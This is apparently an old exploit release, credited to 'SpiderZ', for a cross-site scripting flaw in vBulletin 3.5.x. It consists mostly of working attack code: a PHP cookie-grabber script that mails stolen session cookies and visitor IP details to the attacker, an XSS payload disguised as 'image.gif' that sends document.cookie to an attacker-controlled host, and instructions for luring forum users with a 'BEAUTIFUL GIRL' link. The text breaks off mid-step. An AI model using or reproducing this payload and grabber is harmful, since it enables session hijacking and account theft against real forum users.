/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'
=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
=> Author: SpiderZ
=> Sito: www.spiderz.tk
( 1 )
Name file: exploit.php
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>
<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$cookie = $_GET['c'];
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
( 2 )
Name file: image.gif
<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >
location="http://YOUR ADDRESS WEB.com
( 3 )
1° new thread
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3° Submit
4° It waits for